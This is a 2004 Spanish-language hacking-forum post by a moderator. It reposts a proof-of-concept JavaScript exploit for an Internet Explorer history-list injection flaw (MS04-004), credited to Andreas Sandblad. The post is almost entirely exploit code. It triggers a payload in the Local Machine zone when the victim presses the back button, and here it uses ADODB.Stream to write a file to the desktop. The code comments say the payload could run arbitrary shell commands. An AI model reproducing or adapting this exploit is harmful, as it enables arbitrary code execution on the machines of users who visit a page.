..:: Foro Cyberpirata.org  ::.. Última Actividad: Nunca
No ingresado en [Login ]
Ir al final



Versión imprimible | Subscribir | Añadir a Favoritos   Públicar un nuevo mensaje en este foro Encuesta:
Autor: Sujeto: IE Url JavaScript [Inyeccion al Historial]
DarkSigma
Moderator
******




Mensajes: 1059
Registrado: 3-11-2003
Location: Pandemonium
El usuario está desconectado

Humor: .::Sigma::.

[*] publicado en 4-2-2004 en 09:17 PM Responder con cita
IE Url JavaScript [Inyeccion al Historial]



Internet Explorer url javascript injection in history list (MS04-004)

<Script>

// Andreas Sandblad, 2004-02-03, patched by MS04-004

// Name:        Payload

// Purpose:     Run payload code called from Local Machine zone.

//                   The code may be arbitrary such as executing shell commands.

//                   This demo simply creates a harmless textfile on the desktop.

function payload() {

    file = "sandblad.txt";

    o = new ActiveXObject("ADODB.Stream");

    o.Open();

    o.Type=2;

    o.Charset="ascii";

    o.WriteText("You are vulnerable!");

    o.SaveToFile(file, 2);

    o.Close();

    alert("File "+file+" created on desktop!");

}

// Name:        Trigger

// Purpose:     Inject javascript url in history list and run payload

//                  function when the user hits the backbutton.

function trigger(len) {

    if (history.length != len)

        payload();

    else

        return "<title>-</title><body

onload=external.NavigateAndFind('res:','','')>";

}

// Name:        Backbutton

// Purpose:     Run backbutton exploit.

function backbutton() {

    location = 'javascript:'+trigger+payload+'trigger('+history.length+')';

}

// Launch backbutton exploit on load

if (confirm("Press OK to run backbutton exploit!"))

    backbutton();

</Script>



.::Sigma::.




http://es.geocities.com/human_saviour/Emoticonos/Emo45.gif El Oscuro Coleccionista...
Ver perfil del usuario E-Mail de Usuario Visitar página web Ver todos los mensajes de este Usuario Mensajeria U2U
Públicar un nuevo mensaje en este foro Encuesta:


Ir al principio


Powered by XMB
Developed By Aventure Media & The XMB Group © 2002-2005


[consultas: 15]
[PHP: 61.3% - SQL: 38.7%]